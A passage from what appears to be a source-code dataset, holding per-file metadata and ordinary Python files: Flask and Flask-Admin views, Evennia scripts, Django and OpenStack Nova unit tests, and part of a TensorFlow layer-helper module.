| 0.000052
| 96,033
| 2
| 90,211
| 48,016.5
| 0.631972
| 0
| 0
| 0
| 0
| 1
| 0.999604
| 0.999604
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
d9f8fde96d9d95889eac929780686cd8c4180411
| 165
|
py
|
Python
|
efecan/app/routes.py
|
ibrahimediz/flaskrest
|
e0d52d35dc5b3aff8a7a15832c84e1c3882c4f36
|
[
"MIT"
] | null | null | null |
efecan/app/routes.py
|
ibrahimediz/flaskrest
|
e0d52d35dc5b3aff8a7a15832c84e1c3882c4f36
|
[
"MIT"
] | null | null | null |
efecan/app/routes.py
|
ibrahimediz/flaskrest
|
e0d52d35dc5b3aff8a7a15832c84e1c3882c4f36
|
[
"MIT"
] | null | null | null |
from app import app
from flask import render_template
@app.route('/')
@app.route('/index')
def index():
return render_template("index.html",message = "Hellö")
| 18.333333
| 58
| 0.709091
| 23
| 165
| 5
| 0.565217
| 0.243478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 165
| 8
| 59
| 20.625
| 0.804196
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.333333
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8a12f1a65d5f3d6c4217d9aaf1142a51fb52bc1a
| 2,260
|
py
|
Python
|
athanor_rplogger/gamedb.py
|
volundmush/athanor_rplogger
|
05bdce1596c90902bc71e1c3a5b325852bd47702
|
[
"BSD-3-Clause"
] | null | null | null |
athanor_rplogger/gamedb.py
|
volundmush/athanor_rplogger
|
05bdce1596c90902bc71e1c3a5b325852bd47702
|
[
"BSD-3-Clause"
] | null | null | null |
athanor_rplogger/gamedb.py
|
volundmush/athanor_rplogger
|
05bdce1596c90902bc71e1c3a5b325852bd47702
|
[
"BSD-3-Clause"
] | null | null | null |
import re
from evennia.utils.ansi import ANSIString
from athanor.gamedb.scripts import AthanorOptionScript
from athanor.gamedb.models import PlotBridge, EventBridge
class AthanorPlot(AthanorOptionScript):
re_name = re.compile(r"")
lockstring = ""
def create_bridge(self, key, clean_key):
if hasattr(self, 'plot_bridge'):
return
bridge, created = PlotBridge.objects.get_or_create(db_script=self, db_name=clean_key,
db_iname=clean_key.lower(), db_cname=key)
if created:
bridge.save()
def setup_locks(self):
self.locks.add(self.lockstring)
@classmethod
def create_plot(cls, key, **kwargs):
key = ANSIString(key)
clean_key = str(key.clean())
if '|' in clean_key:
raise ValueError("Malformed ANSI in Plot Name.")
if PlotBridge.objects.filter(db_iname=clean_key.lower()).count():
raise ValueError("Name conflicts with another Plot.")
script, errors = cls.create(clean_key, **kwargs)
if script:
script.create_bridge(key, clean_key)
script.setup_locks()
return script
class AthanorEvent(AthanorOptionScript):
re_name = re.compile(r"")
lockstring = ""
def create_bridge(self, key, clean_key):
if hasattr(self, 'event_bridge'):
return
bridge, created = EventBridge.objects.get_or_create(db_script=self, db_name=clean_key,
db_iname=clean_key.lower(), db_cname=key)
if created:
bridge.save()
def setup_locks(self):
self.locks.add(self.lockstring)
@classmethod
def create_event(cls, key, **kwargs):
key = ANSIString(key)
clean_key = str(key.clean())
if '|' in clean_key:
raise ValueError("Malformed ANSI in Plot Name.")
if PlotBridge.objects.filter(db_iname=clean_key.lower()).count():
raise ValueError("Name conflicts with another Plot.")
script, errors = cls.create(clean_key, **kwargs)
if script:
script.create_bridge(key, clean_key)
script.setup_locks()
return script
| 32.753623
| 101
| 0.609292
| 261
| 2,260
| 5.10728
| 0.226054
| 0.096024
| 0.049512
| 0.045011
| 0.8012
| 0.8012
| 0.8012
| 0.8012
| 0.8012
| 0.8012
| 0
| 0
| 0.290265
| 2,260
| 68
| 102
| 33.235294
| 0.831047
| 0
| 0
| 0.777778
| 0
| 0
| 0.065102
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.074074
| 0
| 0.37037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a30b4d5e1ff531d15285aae1b1900d25966201e
| 4,960
|
py
|
Python
|
tests/tests/test_listener.py
|
litchfield/django-dynamic-sprites
|
a369221a6a33c40b0b9c8590ce1b3023a644a26c
|
[
"BSD-3-Clause"
] | 4
|
2015-09-23T07:45:11.000Z
|
2021-12-27T07:21:48.000Z
|
tests/tests/test_listener.py
|
litchfield/django-dynamic-sprites
|
a369221a6a33c40b0b9c8590ce1b3023a644a26c
|
[
"BSD-3-Clause"
] | 3
|
2020-02-11T21:07:29.000Z
|
2021-06-10T17:22:57.000Z
|
tests/tests/test_listener.py
|
litchfield/django-dynamic-sprites
|
a369221a6a33c40b0b9c8590ce1b3023a644a26c
|
[
"BSD-3-Clause"
] | 2
|
2016-04-09T05:14:30.000Z
|
2019-06-01T05:13:41.000Z
|
# coding: utf8
import os
from django.conf import settings
from django.db.models.signals import post_save
from django.test import TestCase
from dynamic_sprites.image import Image
from dynamic_sprites.listeners import ModelSpriteListener
from tests.models import Country
class ModelSpriteListenerSavingAnObjectInQuerysetTestCase(object):
def setUp(self):
self.name = 'listener-sprite'
listener = ModelSpriteListener(
name=self.name,
queryset=Country.objects.all(),
image_field='flag',
slug_field='slug',
)
post_save.connect(listener, sender=Country)
self.new_country = Country(
name="Canada",
flag='country/flags/can.png',
slug='canada'
)
self.new_country.save()
self.image_path = os.path.join(settings.MEDIA_ROOT, self.name + ".png")
self.css_path = os.path.join(settings.MEDIA_ROOT, self.name + ".css")
def tearDown(self):
self.new_country.delete()
if os.path.exists(self.image_path):
os.remove(self.image_path)
if os.path.exists(self.css_path):
os.remove(self.css_path)
def test_saving_an_object_creates_a_new_sprite_image(self):
self.assertTrue(os.path.exists(self.image_path))
def test_saving_an_object_creates_a_new_sprite_image_with_the_objects_image_dimensions(self):
image = Image(self.image_path)
self.assertEqual(48, image.width)
self.assertEqual(48, image.height)
def test_saving_an_object_creates_a_new_sprite_css(self):
self.assertTrue(os.path.exists(self.css_path))
def test_saving_an_object_creates_a_new_sprite_css_with_the_expected_style(self):
with open(self.css_path, 'r') as f:
css = f.read()
self.assertTrue(isinstance(css, basestring))
self.assertIn('.sprite-%s' % self.name, css)
self.assertIn('.sprite-%s-%s{background-position:-0px -0px}' % (self.name, self.new_country.slug), css)
class ModelSpriteListenerUnderstandsQuerysetFromInstanceTestCase(TestCase):
def setUp(self):
self.name = 'listener-sprite'
listener = ModelSpriteListener(
name=self.name,
image_field='flag',
slug_field='slug',
)
post_save.connect(listener, sender=Country)
self.new_country = Country(
name="Canada",
flag='country/flags/can.png',
slug='canada'
)
self.new_country.save()
self.image_path = os.path.join(settings.MEDIA_ROOT, self.name + ".png")
self.css_path = os.path.join(settings.MEDIA_ROOT, self.name + ".css")
def tearDown(self):
self.new_country.delete()
if os.path.exists(self.image_path):
os.remove(self.image_path)
if os.path.exists(self.css_path):
os.remove(self.css_path)
def test_saving_an_object_creates_a_new_sprite_image(self):
self.assertTrue(os.path.exists(self.image_path))
def test_saving_an_object_creates_a_new_sprite_image_with_the_objects_image_dimensions(self):
image = Image(self.image_path)
self.assertEqual(48, image.width)
self.assertEqual(48, image.height)
def test_saving_an_object_creates_a_new_sprite_css(self):
self.assertTrue(os.path.exists(self.css_path))
def test_saving_an_object_creates_a_new_sprite_css_with_the_expected_style(self):
with open(self.css_path, 'r') as f:
css = f.read()
self.assertTrue(isinstance(css, basestring))
self.assertIn('.sprite-%s' % self.name, css)
self.assertIn('.sprite-%s-%s{background-position:-0px -0px}' % (self.name, self.new_country.slug), css)
class ModelSpriteListenerSavingAnObjectNotInQuerysetTestCase(object):
def setUp(self):
self.name = 'listener-sprite'
listener = ModelSpriteListener(
name=self.name,
queryset=Country.objects.filter(slug='brazil'),
image_field='flag',
slug_field='slug',
)
post_save.connect(listener, sender=Country)
self.new_country = Country(
name="Canada",
flag='country/flags/can.png',
slug='canada'
)
self.new_country.save()
self.image_path = os.path.join(settings.MEDIA_ROOT, self.name + ".png")
self.css_path = os.path.join(settings.MEDIA_ROOT, self.name + ".css")
def tearDown(self):
self.new_country.delete()
if os.path.exists(self.image_path):
os.remove(self.image_path)
if os.path.exists(self.css_path):
os.remove(self.css_path)
def test_saving_an_object_that_is_not_in_queryset_dont_create_image(self):
self.assertFalse(os.path.exists(self.image_path))
def test_saving_an_object_that_is_not_in_queryset_dont_create_css(self):
self.assertFalse(os.path.exists(self.css_path))
| 36.20438
| 111
| 0.663508
| 636
| 4,960
| 4.921384
| 0.143082
| 0.034505
| 0.058147
| 0.061342
| 0.86262
| 0.86262
| 0.860383
| 0.843131
| 0.843131
| 0.843131
| 0
| 0.003385
| 0.225605
| 4,960
| 136
| 112
| 36.470588
| 0.811507
| 0.002419
| 0
| 0.8
| 0
| 0
| 0.062273
| 0.028104
| 0
| 0
| 0
| 0
| 0.145455
| 1
| 0.145455
| false
| 0
| 0.063636
| 0
| 0.236364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a842a925fa0fb63515c381263b512776fbe4d7e
| 7,642
|
py
|
Python
|
nova/tests/unit/scheduler/filters/test_numa_topology_filters.py
|
jamielennox/nova
|
ef42f74a07b6a96252f91f1755631ddc314a3b2f
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/scheduler/filters/test_numa_topology_filters.py
|
jamielennox/nova
|
ef42f74a07b6a96252f91f1755631ddc314a3b2f
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/scheduler/filters/test_numa_topology_filters.py
|
jamielennox/nova
|
ef42f74a07b6a96252f91f1755631ddc314a3b2f
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_serialization import jsonutils
from nova import objects
from nova.objects import base as obj_base
from nova.scheduler.filters import numa_topology_filter
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.scheduler import fakes
class TestNUMATopologyFilter(test.NoDBTestCase):
def setUp(self):
super(TestNUMATopologyFilter, self).setUp()
self.filt_cls = numa_topology_filter.NUMATopologyFilter()
def test_numa_topology_filter_pass(self):
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
self.assertIsInstance(host.instance_numa_topology,
objects.InstanceNUMATopology)
def test_numa_topology_filter_numa_instance_no_numa_host_fail(self):
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1', {'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
self.assertIsNone(host.instance_numa_topology)
def test_numa_topology_filter_numa_host_no_numa_instance_pass(self):
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = None
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
self.assertIsNone(host.instance_numa_topology)
def test_numa_topology_filter_fail_fit(self):
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([2]), memory=512),
objects.InstanceNUMACell(id=2, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
self.assertIsNone(host.instance_numa_topology)
def test_numa_topology_filter_fail_memory(self):
self.flags(ram_allocation_ratio=1)
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]),
memory=1024),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
self.assertIsNone(host.instance_numa_topology)
def test_numa_topology_filter_fail_cpu(self):
self.flags(cpu_allocation_ratio=1)
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3, 4, 5]),
memory=512)])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
self.assertIsNone(host.instance_numa_topology)
def test_numa_topology_filter_pass_set_limit(self):
self.flags(cpu_allocation_ratio=21)
self.flags(ram_allocation_ratio=1.3)
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
self.assertIsInstance(host.instance_numa_topology,
objects.InstanceNUMATopology)
limits = host.limits['numa_topology']
self.assertEqual(limits.cpu_allocation_ratio, 21)
self.assertEqual(limits.ram_allocation_ratio, 1.3)
| 48.987179
| 79
| 0.633735
| 808
| 7,642
| 5.738861
| 0.165842
| 0.093164
| 0.060384
| 0.028682
| 0.796636
| 0.779168
| 0.746172
| 0.746172
| 0.746172
| 0.746172
| 0
| 0.017266
| 0.272442
| 7,642
| 155
| 80
| 49.303226
| 0.816727
| 0.071447
| 0
| 0.726563
| 0
| 0
| 0.061008
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.0625
| false
| 0.078125
| 0.0625
| 0
| 0.132813
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8a99c11aae94f7a188468f6d77ecf58eda6b315e
| 224
|
py
|
Python
|
flambe/nlp/__init__.py
|
ethan-asapp/flambe
|
70257167058c7b82ee39f74167a6161bd264ad18
|
[
"MIT"
] | 148
|
2019-08-29T21:19:03.000Z
|
2022-03-18T06:13:53.000Z
|
flambe/nlp/__init__.py
|
cle-ros/flambe
|
0dc2f5b2b286694defe8abf450fe5be9ae12c097
|
[
"MIT"
] | 108
|
2019-09-03T14:36:10.000Z
|
2020-05-13T15:53:14.000Z
|
flambe/nlp/__init__.py
|
cle-ros/flambe
|
0dc2f5b2b286694defe8abf450fe5be9ae12c097
|
[
"MIT"
] | 21
|
2019-09-08T14:09:45.000Z
|
2020-12-27T04:12:33.000Z
|
from flambe.nlp import language_modeling
from flambe.nlp import classification
from flambe.nlp import fewshot
from flambe.nlp import transformers
__all__ = ['language_modeling', 'classification', 'fewshot', 'transformers']
| 32
| 76
| 0.816964
| 27
| 224
| 6.555556
| 0.37037
| 0.225989
| 0.293785
| 0.429379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102679
| 224
| 6
| 77
| 37.333333
| 0.880597
| 0
| 0
| 0
| 0
| 0
| 0.223214
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8aa0c663c05aa4279f5bf12c21fb384a4523da40
| 4,459
|
py
|
Python
|
flask_admin/contrib/appengine/view.py
|
gstf/flask-admin
|
5f1b2d8813c7aa048862a820d17a6efbeba8c42f
|
[
"BSD-3-Clause"
] | 1
|
2019-04-13T20:53:16.000Z
|
2019-04-13T20:53:16.000Z
|
flask_admin/contrib/appengine/view.py
|
gstf/flask-admin
|
5f1b2d8813c7aa048862a820d17a6efbeba8c42f
|
[
"BSD-3-Clause"
] | null | null | null |
flask_admin/contrib/appengine/view.py
|
gstf/flask-admin
|
5f1b2d8813c7aa048862a820d17a6efbeba8c42f
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from flask_admin.model import BaseModelView
from wtforms_appengine import db as wt_db
from wtforms_appengine import ndb as wt_ndb
from google.appengine.ext import db
from google.appengine.ext import ndb
class NdbModelView(BaseModelView):
"""
AppEngine NDB model scaffolding.
"""
def get_pk_value(self, model):
return model.key.urlsafe()
def scaffold_list_columns(self):
return sorted([k for (k, v) in self.model.__dict__.iteritems() if isinstance(v, ndb.Property)])
def scaffold_sortable_columns(self):
return [k for (k, v) in self.model.__dict__.iteritems() if isinstance(v, ndb.Property) and v._indexed]
def init_search(self):
return None
def is_valid_filter(self):
pass
def scaffold_filters(self):
#TODO: implement
pass
def scaffold_form(self):
return wt_ndb.model_form(self.model())
def get_list(self, page, sort_field, sort_desc, search, filters):
#TODO: implement filters (don't think search can work here)
q = self.model.query()
if sort_field:
order_field = getattr(self.model, sort_field)
if sort_desc:
order_field = -order_field
q = q.order(order_field)
results = q.fetch(self.page_size, offset=page*self.page_size)
return q.count(), results
def get_one(self, urlsafe_key):
return ndb.Key(urlsafe=urlsafe_key).get()
def create_model(self, form):
try:
model = self.model()
form.populate_obj(model)
model.put()
return True
except Exception as ex:
if not self.handle_view_exception(ex):
#flash(gettext('Failed to create record. %(error)s',
# error=ex), 'error')
logging.exception('Failed to create record.')
return False
def update_model(self, form, model):
try:
form.populate_obj(model)
model.put()
return True
except Exception as ex:
if not self.handle_view_exception(ex):
#flash(gettext('Failed to update record. %(error)s',
# error=ex), 'error')
logging.exception('Failed to update record.')
return False
def delete_model(self, model):
try:
model.key.delete()
return True
except Exception as ex:
if not self.handle_view_exception(ex):
#flash(gettext('Failed to delete record. %(error)s',
# error=ex),
# 'error')
logging.exception('Failed to delete record.')
return False
class DbModelView(BaseModelView):
"""
AppEngine DB model scaffolding.
"""
def get_pk_value(self, model):
return str(model.key())
def scaffold_list_columns(self):
return sorted([k for (k, v) in self.model.__dict__.iteritems() if isinstance(v, db.Property)])
def scaffold_sortable_columns(self):
return [k for (k, v) in self.model.__dict__.iteritems() if isinstance(v, db.Property) and v._indexed]
def init_search(self):
return None
def is_valid_filter(self):
pass
def scaffold_filters(self):
#TODO: implement
pass
def scaffold_form(self):
return wt_db.model_form(self.model())
def get_list(self, page, sort_field, sort_desc, search, filters):
#TODO: implement filters (don't think search can work here)
q = self.model.all()
if sort_field:
if sort_desc:
sort_field = "-" + sort_field
q.order(sort_field)
results = q.fetch(self.page_size, offset=page*self.page_size)
return q.count(), results
def get_one(self, encoded_key):
return db.get(db.Key(encoded=encoded_key))
def create_model(self, form):
try:
model = self.model()
form.populate_obj(model)
model.put()
return True
except Exception as ex:
if not self.handle_view_exception(ex):
#flash(gettext('Failed to create record. %(error)s',
# error=ex), 'error')
logging.exception('Failed to create record.')
return False
def update_model(self, form, model):
try:
form.populate_obj(model)
model.put()
return True
except Exception as ex:
if not self.handle_view_exception(ex):
#flash(gettext('Failed to update record. %(error)s',
# error=ex), 'error')
logging.exception('Failed to update record.')
return False
def delete_model(self, model):
try:
model.delete()
return True
except Exception as ex:
if not self.handle_view_exception(ex):
#flash(gettext('Failed to delete record. %(error)s',
# error=ex),
# 'error')
logging.exception('Failed to delete record.')
return False
def ModelView(model):
if issubclass(model, ndb.Model):
return NdbModelView(model)
elif issubclass(model, db.Model):
return DbModelView(model)
else:
raise ValueError("Unsupported model: %s" % model)
| 24.910615
| 104
| 0.708455
| 652
| 4,459
| 4.693252
| 0.162577
| 0.044118
| 0.031373
| 0.04902
| 0.807843
| 0.777124
| 0.777124
| 0.777124
| 0.777124
| 0.748366
| 0
| 0
| 0.172909
| 4,459
| 178
| 105
| 25.050562
| 0.829718
| 0.142857
| 0
| 0.694915
| 0
| 0
| 0.043846
| 0
| 0
| 0
| 0
| 0.011236
| 0
| 1
| 0.211864
| false
| 0.033898
| 0.050847
| 0.101695
| 0.516949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
76df1acd55ffa358b6adc4a7643e7bcfce35c032
| 37,598
|
py
|
Python
|
tensorflow_/tensorflowcv/models/common.py
|
nalbwa/imgclsmob
|
a564dbf28f74ca94594426ac93f6143a74e490ec
|
[
"MIT"
] | 1
|
2019-12-23T04:36:46.000Z
|
2019-12-23T04:36:46.000Z
|
tensorflow_/tensorflowcv/models/common.py
|
nalbwa/imgclsmob
|
a564dbf28f74ca94594426ac93f6143a74e490ec
|
[
"MIT"
] | null | null | null |
tensorflow_/tensorflowcv/models/common.py
|
nalbwa/imgclsmob
|
a564dbf28f74ca94594426ac93f6143a74e490ec
|
[
"MIT"
] | null | null | null |
"""
Common routines for models in TensorFlow.
"""
__all__ = ['is_channels_first', 'get_channel_axis', 'flatten', 'batchnorm', 'maxpool2d', 'avgpool2d', 'conv2d',
'conv1x1', 'conv3x3', 'depthwise_conv3x3', 'conv_block', 'conv1x1_block', 'conv3x3_block', 'conv7x7_block',
'dwconv3x3_block', 'dwconv5x5_block', 'pre_conv_block', 'pre_conv1x1_block', 'pre_conv3x3_block', 'se_block',
'channel_shuffle', 'channel_shuffle2']
import math
import numpy as np
import tensorflow as tf
def get_activation_layer(x,
activation,
name="activ"):
"""
Create activation layer from string/function.
Parameters:
----------
x : Tensor
Input tensor.
activation : function or str
Activation function or name of activation function.
name : str, default 'activ'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
assert (activation is not None)
if isinstance(activation, str):
if activation == "relu":
x = tf.nn.relu(x, name=name)
elif activation == "relu6":
x = tf.nn.relu6(x, name=name)
else:
raise NotImplementedError()
else:
x = activation(x)
return x
def is_channels_first(data_format):
"""
Is tested data format channels first.
Parameters:
----------
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
Returns
-------
bool
A flag.
"""
return data_format == "channels_first"
def get_channel_axis(data_format):
"""
Get channel axis.
Parameters:
----------
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
Returns
-------
int
Channel axis.
"""
return 1 if is_channels_first(data_format) else -1
def flatten(x,
data_format):
"""
Flattens the input to two dimensional.
Parameters:
----------
x : Tensor
Input tensor.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
Returns
-------
Tensor
Resulted tensor.
"""
if not is_channels_first(data_format):
x = tf.transpose(x, perm=(0, 3, 1, 2))
x = tf.reshape(x, shape=(-1, np.prod(x.get_shape().as_list()[1:])))
return x
def batchnorm(x,
momentum=0.9,
epsilon=1e-5,
training=False,
data_format="channels_last",
name=None):
"""
Batch normalization layer.
Parameters:
----------
x : Tensor
Input tensor.
momentum : float, default 0.9
Momentum for the moving average.
epsilon : float, default 1e-5
Small float added to variance to avoid dividing by zero.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default None
Layer name.
Returns
-------
Tensor
Resulted tensor.
"""
x = tf.keras.layers.BatchNormalization(
axis=get_channel_axis(data_format),
momentum=momentum,
epsilon=epsilon,
name=name)(
inputs=x,
training=training)
return x
def maxpool2d(x,
pool_size,
strides,
padding=0,
ceil_mode=False,
data_format="channels_last",
name=None):
"""
Max pooling operation for two dimensional (spatial) data.
Parameters:
----------
x : Tensor
Input tensor.
pool_size : int or tuple/list of 2 int
Size of the max pooling windows.
strides : int or tuple/list of 2 int
Strides of the pooling.
padding : int or tuple/list of 2 int, default 0
Padding value for convolution layer.
ceil_mode : bool, default False
When `True`, will use ceil instead of floor to compute the output shape.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default None
Layer name.
Returns
-------
Tensor
Resulted tensor.
"""
if isinstance(pool_size, int):
pool_size = (pool_size, pool_size)
if isinstance(strides, int):
strides = (strides, strides)
if isinstance(padding, int):
padding = (padding, padding)
if ceil_mode:
height = int(x.shape[2])
out_height = float(height + 2 * padding[0] - pool_size[0]) / strides[0] + 1.0
if math.ceil(out_height) > math.floor(out_height):
padding = (padding[0] + 1, padding[1])
width = int(x.shape[3])
out_width = float(width + 2 * padding[1] - pool_size[1]) / strides[1] + 1.0
if math.ceil(out_width) > math.floor(out_width):
padding = (padding[0], padding[1] + 1)
if (padding[0] > 0) or (padding[1] > 0):
if is_channels_first(data_format):
x = tf.pad(x, [[0, 0], [0, 0], list(padding), list(padding)], mode="REFLECT")
else:
x = tf.pad(x, [[0, 0], list(padding), list(padding), [0, 0]], mode="REFLECT")
x = tf.keras.layers.MaxPooling2D(
pool_size=pool_size,
strides=strides,
padding="valid",
data_format=data_format,
name=name)(x)
return x
def avgpool2d(x,
pool_size,
strides,
padding=0,
ceil_mode=False,
data_format="channels_last",
name=None):
"""
Average pooling operation for two dimensional (spatial) data.
Parameters:
----------
x : Tensor
Input tensor.
pool_size : int or tuple/list of 2 int
Size of the max pooling windows.
strides : int or tuple/list of 2 int
Strides of the pooling.
padding : int or tuple/list of 2 int, default 0
Padding value for convolution layer.
ceil_mode : bool, default False
When `True`, will use ceil instead of floor to compute the output shape.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default None
Layer name.
Returns
-------
Tensor
Resulted tensor.
"""
if isinstance(pool_size, int):
pool_size = (pool_size, pool_size)
if isinstance(strides, int):
strides = (strides, strides)
if isinstance(padding, int):
padding = (padding, padding)
if ceil_mode:
height = int(x.shape[2])
out_height = float(height + 2 * padding[0] - pool_size[0]) / strides[0] + 1.0
if math.ceil(out_height) > math.floor(out_height):
padding = (padding[0] + 1, padding[1])
width = int(x.shape[3])
out_width = float(width + 2 * padding[1] - pool_size[1]) / strides[1] + 1.0
if math.ceil(out_width) > math.floor(out_width):
padding = (padding[0], padding[1] + 1)
if (padding[0] > 0) or (padding[1] > 0):
if is_channels_first(data_format):
x = tf.pad(x, [[0, 0], [0, 0], list(padding), list(padding)], mode="CONSTANT")
else:
x = tf.pad(x, [[0, 0], list(padding), list(padding), [0, 0]], mode="CONSTANT")
x = tf.keras.layers.AveragePooling2D(
pool_size=pool_size,
strides=1,
padding="valid",
data_format=data_format,
